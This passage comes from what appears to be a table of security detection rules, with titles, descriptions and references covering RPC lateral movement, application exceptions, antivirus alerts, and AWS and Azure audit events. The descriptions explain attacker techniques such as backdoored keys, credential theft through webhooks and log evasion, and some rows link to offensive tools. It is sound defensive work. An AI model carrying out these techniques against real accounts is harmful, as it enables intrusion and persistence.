https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Server Service Abuse for Lateral Movement |
Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Schedule Task Lateral Movement via SASec |
Detects remote RPC calls to create or execute a scheduled task via SASec |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Recon Activity via SASec |
Detects remote RPC calls to read information about scheduled tasks via SASec |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
SharpHound Recon Account Discovery |
Detects remote RPC calls used by SharpHound to map remote connections and local group membership. |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
SharpHound Recon Sessions |
Detects remote RPC calls used by SharpHound to map remote connections and local group membership. |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Ruby on Rails Framework Exceptions |
Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts |
http://edgeguides.rubyonrails.org/security.html, http://guides.rubyonrails.org/action_controller_overview.html, https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception, https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb |
Spring Framework Exceptions |
Detects suspicious Spring framework exceptions that could indicate exploitation attempts |
https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html |
Potential SpEL Injection In Spring Framework |
Detects potential SpEL Injection exploitation, which may lead to RCE. |
https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Suspicious SQL Error Messages |
Detects SQL error messages that indicate probing for an injection attack |
http://www.sqlinjection.net/errors |
Potential Server Side Template Injection In Velocity |
Detects exceptions in the Velocity template renderer. These most likely happen due to dynamic rendering of user input and may lead to RCE. |
https://antgarsil.github.io/posts/velocity/, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Antivirus Exploitation Framework Detection |
Detects a highly relevant Antivirus alert that reports an exploitation framework.
This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
|
https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797, https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424, https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466 |
Antivirus Hacktool Detection |
Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.
This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
|
https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/, https://www.nextron-systems.com/?s=antivirus |
Antivirus Password Dumper Detection |
Detects a highly relevant Antivirus alert that reports a password dumper.
This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
|
https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619, https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448 |
Antivirus Ransomware Detection |
Detects a highly relevant Antivirus alert that reports ransomware.
This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
|
https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916, https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7, https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045, https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d, https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c, https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05 |
Antivirus Web Shell Detection |
Detects a highly relevant Antivirus alert that reports a web shell.
It is highly recommended to tune this rule to the specific strings used by your antivirus solution, for example by downloading a large web shell repository from GitHub and checking which detection names match.
This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
|
https://www.nextron-systems.com/?s=antivirus, https://github.com/tennc/webshell, https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection, https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection, https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection, https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection, https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection, https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection, https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection, https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection |
Antivirus Relevant File Paths Alerts |
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
|
https://www.nextron-systems.com/?s=antivirus |
Suspicious SQL Query |
Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities, such as dropping tables and selecting wildcard fields. |
https://github.com/sqlmapproject/sqlmap |
AWS Attached Malicious Lambda Layer |
Detects when a user attaches a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.
This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
|
https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html |
AWS CloudTrail Important Change |
Detects disabling, deleting and updating of a Trail |
https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html |
Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure |
Detects when an instance identity has taken an action that isn't inside SSM.
This can indicate that a compromised EC2 instance is being used as a pivot point.
|
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html, https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/, https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things |
New Network ACL Entry Added |
Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
New Network Route Added |
Detects the addition of a new network route to a route table in AWS.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
Ingress/Egress Security Group Modification |
Detects when an account makes changes to the ingress or egress rules of a security group.
This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
LoadBalancer Security Group Modification |
Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).
This can indicate a misconfiguration allowing more traffic into the system than required, or that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
RDS Database Security Group Modification |
Detects changes to the security group entries for RDS databases.
This can indicate a misconfiguration that exposes the database to the public internet or to a wider audience within the VPC, or the removal of valid rules, which could impact the availability of the database to legitimate services and users.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
Potential Malicious Usage of CloudTrail System Manager |
Detects when System Manager successfully executes commands against an instance.
|
https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml |
AWS Config Disabling Channel/Recorder |
Detects AWS Config Service disabling |
https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html |
AWS Console GetSigninToken Potential Abuse |
Detects potentially suspicious events involving "GetSigninToken".
An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA, using the new access key issued in this request.
|
https://github.com/NetSPI/aws_consoler, https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/ |
SES Identity Has Been Deleted |
Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
AWS SAML Provider Deletion Activity |
Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access.
An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
|
https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html |
AWS S3 Bucket Versioning Disable |
Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. |
https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82 |
AWS Key Pair Import Activity |
Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
|
https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html |
AWS EC2 Disable EBS Encryption |
Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.
Disabling default encryption does not change the encryption status of your existing volumes.
|
https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html |
AWS EC2 Startup Shell Script Change |
Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9 |
AWS EC2 VM Export Failure |
An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. |
https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance |
AWS ECS Task Definition That Queries The Credential Endpoint |
Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.
This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
|
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py, https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html, https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html |
AWS EFS Fileshare Modified or Deleted |
Detects when an EFS Fileshare is modified or deleted.
You can't delete a file system that is in use.
If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.
|
https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html |
AWS EFS Fileshare Mount Modified or Deleted |
Detects when an EFS Fileshare Mount is modified or deleted. An adversary may break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. |
https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html |
AWS EKS Cluster Created or Deleted |
Identifies when an EKS cluster is created or deleted. |
https://any-api.com/amazonaws_com/eks/docs/API_Description |
AWS ElastiCache Security Group Created |
Detects when an ElastiCache security group has been created. |
https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml |
AWS ElastiCache Security Group Modified or Deleted |
Identifies when an ElastiCache security group has been modified or deleted. |
https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml |
Potential Bucket Enumeration on AWS |
Looks for potential enumeration of AWS buckets via ListBuckets. |
https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md, https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html, https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/ |
AWS GuardDuty Important Change |
Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9 |
AWS IAM Backdoor Users Keys |
Detects AWS API key creation for a user by another user.
Backdoored users can be used to obtain persistence in the AWS environment.
Also with this alert, you can detect a flow of AWS keys in your org.
|
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py |
AWS IAM S3Browser Templated S3 Bucket Policy Creation |
Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "". |
https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor |
AWS IAM S3Browser LoginProfile Creation |
Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. |
https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor |
AWS IAM S3Browser User or AccessKey Creation |
Detects S3 Browser utility creating IAM User or AccessKey. |
https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor |
New AWS Lambda Function URL Configuration Created |
Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls.
This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
|
https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html, https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc, https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws |
AWS Glue Development Endpoint Activity |
Detects possible suspicious glue development endpoint activity. |
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/, https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html |
AWS RDS Master Password Change |
Detects a change of the database master password. It may be a part of data exfiltration. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py |
Modification or Deletion of an AWS RDS Cluster |
Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information. |
https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html, https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html, https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance |
Restore Public AWS RDS Instance |
Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py |
AWS Root Credentials |
Detects AWS root account usage |
https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html |
AWS Route 53 Domain Transfer Lock Disabled |
Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. |
https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml, https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html, https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html |
AWS Route 53 Domain Transferred to Another Account |
Detects when a request has been made to transfer a Route 53 domain to another AWS account. |
https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml |
AWS S3 Data Management Tampering |
Detects when a user tampers with S3 data management in Amazon Web Services. |
https://github.com/elastic/detection-rules/pull/1145/files, https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html, https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html |
AWS SecurityHub Findings Evasion |
Detects the modification of the findings on SecurityHub. |
https://docs.aws.amazon.com/cli/latest/reference/securityhub/ |
AWS Snapshot Backup Exfiltration |
Detects the modification of an EC2 snapshot's permissions to enable access from another account |
https://www.justice.gov/file/1080281/download |
AWS Identity Center Identity Provider Change |
Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.
A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.
|
https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html, https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html, https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html |
AWS STS AssumeRole Misuse |
Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. |
https://github.com/elastic/detection-rules/pull/1214, https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html |
AWS STS GetSessionToken Misuse |
Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. |
https://github.com/elastic/detection-rules/pull/1213, https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html |
AWS Suspicious SAML Activity |
Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. |
https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html, https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html |
AWS User Login Profile Was Modified |
Detects activity when someone is changing passwords on behalf of other users.
An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.
|
https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation |
Azure Active Directory Hybrid Health AD FS New Server |
This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.
A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.
This can be done programmatically via HTTP requests to Azure.
|
https://o365blog.com/post/hybridhealthagent/ |
Azure Active Directory Hybrid Health AD FS Service Delete |
This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.
A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.
The health AD FS service can then be deleted after it is no longer needed via HTTP requests to Azure.
|
https://o365blog.com/post/hybridhealthagent/ |
User Added to an Administrator's Azure AD Role |
User Added to an Administrator's Azure AD Role |
https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/ |
Azure Application Deleted |
Identifies when an application is deleted in Azure. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy |
Azure Application Gateway Modified or Deleted |
Identifies when an application gateway is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Application Security Group Modified or Deleted |
Identifies when an application security group is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Application Credential Modified |
Identifies when an application credential is modified. |
https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/ |
Azure Container Registry Created or Deleted |
Detects when a Container Registry is created or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Number Of Resource Creation Or Deployment Activities |
Detects the number of VM creation or deployment activities occurring in Azure, via the azureactivity log. |
https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml |
Azure Device No Longer Managed or Compliant |
Identifies when a device in Azure is no longer managed or compliant. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory |
Azure Device or Configuration Modified or Deleted |
Identifies when a device or device configuration in Azure is modified or deleted. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory |
Azure DNS Zone Modified or Deleted |
Identifies when a DNS zone is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes |
Azure Firewall Modified or Deleted |
Identifies when a firewall is created, modified, or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Firewall Rule Collection Modified or Deleted |
Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Granting Of Permissions To An Account |
Identifies IPs from which users grant access to other users on Azure resources and alerts when a previously unseen source IP address is used. |
https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml |
Azure Keyvault Key Modified or Deleted |
Identifies when a Keyvault Key is modified or deleted in Azure. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Key Vault Modified or Deleted |
Identifies when a key vault is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Keyvault Secrets Modified or Deleted |
Identifies when secrets are modified or deleted in Azure. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Kubernetes Admission Controller |
Identifies when an admission controller is executed in Azure Kubernetes.
A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.
The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.
An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.
For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.
An adversary can also use a ValidatingAdmissionWebhook to obtain access credentials: the webhook intercepts requests to the API server and can record secrets and other sensitive information.
|
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes |
Azure Kubernetes Cluster Created or Deleted |
Detects when an Azure Kubernetes Cluster is created or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes CronJob |
Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.
A Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs.
An adversary may use a Kubernetes CronJob to schedule execution of malicious code that would run as a container in the cluster.
|
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/, https://kubernetes.io/docs/concepts/workloads/controllers/job/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ |
Azure Kubernetes Events Deleted |
Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml |
Azure Kubernetes Network Policy Change |
Identifies when an Azure Kubernetes network policy is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes Pods Deleted |
Identifies the deletion of Azure Kubernetes Pods. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml |
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted |
Detects the creation or patching of a potentially malicious RoleBinding/ClusterRoleBinding. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes Sensitive Role Access |
Identifies when ClusterRoles/Roles are being modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes Secret or Config Object Access |
Identifies when a Kubernetes account accesses sensitive objects such as configmaps or secrets. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes Service Account Modified or Deleted |
Identifies when a service account is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Disabled MFA to Bypass Authentication Mechanisms |
